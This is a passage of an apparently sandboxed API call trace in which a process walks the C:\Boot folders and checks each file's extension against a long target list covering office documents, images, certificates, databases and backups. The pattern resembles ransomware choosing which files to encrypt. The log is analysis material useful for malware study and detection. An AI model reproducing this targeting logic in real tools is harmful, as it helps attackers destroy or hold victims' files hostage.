lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0284.915] lstrlenW (lpString=".mxl") returned 4 [0284.915] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".myd") returned 4 [0284.915] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".myi") returned 4 [0284.915] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".nef") returned 4 [0284.915] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".nrw") returned 4 [0284.915] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".obj") returned 4 [0284.915] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".odb") returned 4 [0284.915] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".odc") returned 4 [0284.915] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".odm") returned 4 [0284.915] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".odp") returned 4 [0284.915] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".ods") returned 4 [0284.915] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".oft") returned 4 [0284.915] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".one") returned 4 [0284.915] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0284.915] lstrlenW (lpString=".onepkg") returned 7 [0284.916] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0284.916] lstrlenW (lpString=".onetoc2") returned 8 [0284.916] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0284.916] lstrlenW (lpString=".opt") returned 4 [0284.916] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".oqy") returned 4 [0284.916] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".orf") returned 4 [0284.916] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".p12") returned 4 [0284.916] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".p7b") returned 4 [0284.916] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".p7c") returned 4 [0284.916] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pam") returned 4 [0284.916] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pbm") returned 4 [0284.916] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pct") returned 4 [0284.916] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pcx") returned 4 [0284.916] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pdd") returned 4 [0284.916] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pdf") returned 4 [0284.916] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pdp") returned 4 [0284.916] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pef") returned 4 [0284.916] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pem") returned 4 [0284.916] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0284.916] lstrlenW (lpString=".pff") returned 4 [0284.917] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".pfm") returned 4 [0284.917] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".pfx") returned 4 [0284.917] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".pgm") returned 4 [0284.917] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".php") returned 4 [0284.917] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".php3") returned 5 [0284.917] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0284.917] lstrlenW (lpString=".php4") returned 5 [0284.917] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0284.917] lstrlenW (lpString=".php5") returned 5 [0284.917] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0284.917] lstrlenW (lpString=".phtml") returned 6 [0284.917] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0284.917] lstrlenW (lpString=".pict") returned 5 [0284.917] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0284.917] lstrlenW (lpString=".pl") returned 3 [0284.917] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0284.917] lstrlenW (lpString=".pls") returned 4 [0284.917] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".pm") returned 3 [0284.917] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0284.917] lstrlenW (lpString=".png") returned 4 [0284.917] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".pnm") returned 4 [0284.917] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0284.917] lstrlenW (lpString=".pot") returned 4 [0284.917] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".potm") returned 5 [0284.918] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0284.918] lstrlenW (lpString=".potx") returned 5 [0284.918] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0284.918] lstrlenW (lpString=".ppa") returned 4 [0284.918] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".ppam") returned 5 [0284.918] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0284.918] lstrlenW (lpString=".ppm") returned 4 [0284.918] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".pps") returned 4 [0284.918] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".ppsm") returned 5 [0284.918] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0284.918] lstrlenW (lpString=".ppt") returned 4 [0284.918] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".pptm") returned 5 [0284.918] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0284.918] lstrlenW (lpString=".pptx") returned 5 [0284.918] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0284.918] lstrlenW (lpString=".prn") returned 4 [0284.918] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".ps") returned 3 [0284.918] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0284.918] lstrlenW (lpString=".psb") returned 4 [0284.918] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".psd") returned 4 [0284.918] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".pst") returned 4 [0284.918] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".ptx") returned 4 [0284.918] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0284.918] lstrlenW (lpString=".pub") returned 4 [0284.919] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0284.919] lstrlenW (lpString=".pwm") returned 4 [0284.919] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0284.919] lstrlenW (lpString=".pxr") returned 4 [0284.919] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0284.919] lstrlenW (lpString=".py") returned 3 [0284.919] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0284.919] lstrlenW (lpString=".qt") returned 3 [0284.919] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0284.919] lstrlenW (lpString=".r3d") returned 4 [0284.919] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0284.919] lstrlenW (lpString=".raf") returned 4 [0284.919] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0284.919] lstrlenW (lpString=".rar") returned 4 [0284.919] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.919] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.919] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.920] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0284.920] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.920] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="en-GB", cAlternateFileName="")) returned 1 [0284.920] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.920] lstrlenW (lpString="C:\\Boot\\en-GB") returned 13 [0284.920] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948328 [0284.920] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.920] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.921] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.921] lstrlenW (lpString=".1cd") returned 4 [0284.921] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.921] lstrlenW (lpString=".3ds") returned 4 [0284.921] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0284.921] lstrlenW (lpString=".3fr") returned 4 [0284.921] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0284.921] lstrlenW (lpString=".3g2") returned 4 [0284.921] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0284.921] lstrlenW (lpString=".3gp") returned 4 [0284.921] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0284.921] lstrlenW (lpString=".7z") returned 3 [0284.921] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.921] lstrlenW (lpString=".accda") returned 6 [0284.921] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0284.921] lstrlenW (lpString=".accdb") returned 6 [0284.921] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0284.921] lstrlenW (lpString=".accdc") returned 6 [0284.921] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0284.921] lstrlenW (lpString=".accde") returned 6 [0284.921] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0284.921] lstrlenW (lpString=".accdt") returned 6 [0284.921] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0284.921] lstrlenW (lpString=".accdw") returned 6 [0284.921] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0284.921] lstrlenW (lpString=".adb") returned 4 [0284.922] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".adp") returned 4 [0284.922] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".ai") returned 3 [0284.922] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0284.922] lstrlenW (lpString=".ai3") returned 4 [0284.922] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".ai4") returned 4 [0284.922] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".ai5") returned 4 [0284.922] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".ai6") returned 4 [0284.922] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".ai7") returned 4 [0284.922] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".ai8") returned 4 [0284.922] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".anim") returned 5 [0284.922] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0284.922] lstrlenW (lpString=".arw") returned 4 [0284.922] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".as") returned 3 [0284.922] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0284.922] lstrlenW (lpString=".asa") returned 4 [0284.922] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0284.922] lstrlenW (lpString=".asc") returned 4 [0284.922] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".ascx") returned 5 [0284.923] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0284.923] lstrlenW (lpString=".asm") returned 4 [0284.923] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".asmx") returned 5 [0284.923] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0284.923] lstrlenW (lpString=".asp") returned 4 [0284.923] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".aspx") returned 5 [0284.923] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0284.923] lstrlenW (lpString=".asr") returned 4 [0284.923] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".asx") returned 4 [0284.923] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".avi") returned 4 [0284.923] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".avs") returned 4 [0284.923] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".backup") returned 7 [0284.923] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0284.923] lstrlenW (lpString=".bak") returned 4 [0284.923] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".bay") returned 4 [0284.923] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0284.923] lstrlenW (lpString=".bd") returned 3 [0284.923] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0284.924] lstrlenW (lpString=".bin") returned 4 [0284.924] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".bmp") returned 4 [0284.924] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".bz2") returned 4 [0284.924] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".c") returned 2 [0284.924] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0284.924] lstrlenW (lpString=".cdr") returned 4 [0284.924] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".cer") returned 4 [0284.924] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".cf") returned 3 [0284.924] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0284.924] lstrlenW (lpString=".cfc") returned 4 [0284.924] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".cfm") returned 4 [0284.924] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".cfml") returned 5 [0284.924] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0284.924] lstrlenW (lpString=".cfu") returned 4 [0284.924] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".chm") returned 4 [0284.924] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".cin") returned 4 [0284.924] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0284.924] lstrlenW (lpString=".class") returned 6 [0284.924] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0284.925] lstrlenW (lpString=".clx") returned 4 [0284.925] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".config") returned 7 [0284.925] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0284.925] lstrlenW (lpString=".cpp") returned 4 [0284.925] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".cr2") returned 4 [0284.925] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".crt") returned 4 [0284.925] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".crw") returned 4 [0284.925] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".cs") returned 3 [0284.925] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0284.925] lstrlenW (lpString=".css") returned 4 [0284.925] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".csv") returned 4 [0284.925] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".cub") returned 4 [0284.925] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".dae") returned 4 [0284.925] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".dat") returned 4 [0284.925] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".db") returned 3 [0284.925] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0284.925] lstrlenW (lpString=".dbf") returned 4 [0284.925] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".dbx") returned 4 [0284.925] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0284.925] lstrlenW (lpString=".dc3") returned 4 [0284.926] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".dcm") returned 4 [0284.926] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".dcr") returned 4 [0284.926] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".der") returned 4 [0284.926] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".dib") returned 4 [0284.926] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".dic") returned 4 [0284.926] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".dif") returned 4 [0284.926] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".divx") returned 5 [0284.926] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0284.926] lstrlenW (lpString=".djvu") returned 5 [0284.926] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0284.926] lstrlenW (lpString=".dng") returned 4 [0284.926] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".doc") returned 4 [0284.926] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".docm") returned 5 [0284.926] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0284.926] lstrlenW (lpString=".docx") returned 5 [0284.926] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.926] lstrlenW (lpString=".dot") returned 4 [0284.926] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0284.926] lstrlenW (lpString=".dotm") returned 5 [0284.926] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0284.926] lstrlenW (lpString=".dotx") returned 5 [0284.926] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0284.927] lstrlenW (lpString=".dpx") returned 4 [0284.927] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".dqy") returned 4 [0284.927] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".dsn") returned 4 [0284.927] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".dt") returned 3 [0284.927] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0284.927] lstrlenW (lpString=".dtd") returned 4 [0284.927] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".dwg") returned 4 [0284.927] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".dwt") returned 4 [0284.927] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".dx") returned 3 [0284.927] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0284.927] lstrlenW (lpString=".dxf") returned 4 [0284.927] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".edml") returned 5 [0284.927] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0284.927] lstrlenW (lpString=".efd") returned 4 [0284.927] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".elf") returned 4 [0284.927] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".emf") returned 4 [0284.927] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".emz") returned 4 [0284.927] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".epf") returned 4 [0284.927] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0284.927] lstrlenW (lpString=".eps") returned 4 [0284.927] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0284.928] lstrlenW (lpString=".epsf") returned 5 [0284.928] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0284.928] lstrlenW (lpString=".epsp") returned 5 [0284.928] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0284.928] lstrlenW (lpString=".erf") returned 4 [0284.928] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0284.928] lstrlenW (lpString=".exr") returned 4 [0284.928] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0284.928] lstrlenW (lpString=".f4v") returned 4 [0284.928] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0284.928] lstrlenW (lpString=".fido") returned 5 [0284.928] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0284.928] lstrlenW (lpString=".flm") returned 4 [0284.928] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".flv") returned 4 [0285.073] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".frm") returned 4 [0285.073] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".fxg") returned 4 [0285.073] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".geo") returned 4 [0285.073] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".gif") returned 4 [0285.073] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".grs") returned 4 [0285.073] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".gz") returned 3 [0285.073] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.073] lstrlenW (lpString=".h") returned 2 [0285.073] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.073] lstrlenW (lpString=".hdr") returned 4 [0285.073] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".hpp") returned 4 [0285.073] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".hta") returned 4 [0285.073] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.073] lstrlenW (lpString=".htc") returned 4 [0285.074] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".htm") returned 4 [0285.074] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".html") returned 5 [0285.074] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.074] lstrlenW (lpString=".icb") returned 4 [0285.074] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".ics") returned 4 [0285.074] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".iff") returned 4 [0285.074] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".inc") returned 4 [0285.074] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".indd") returned 5 [0285.074] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.074] lstrlenW (lpString=".ini") returned 4 [0285.074] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".iqy") returned 4 [0285.074] lstrcmpiW 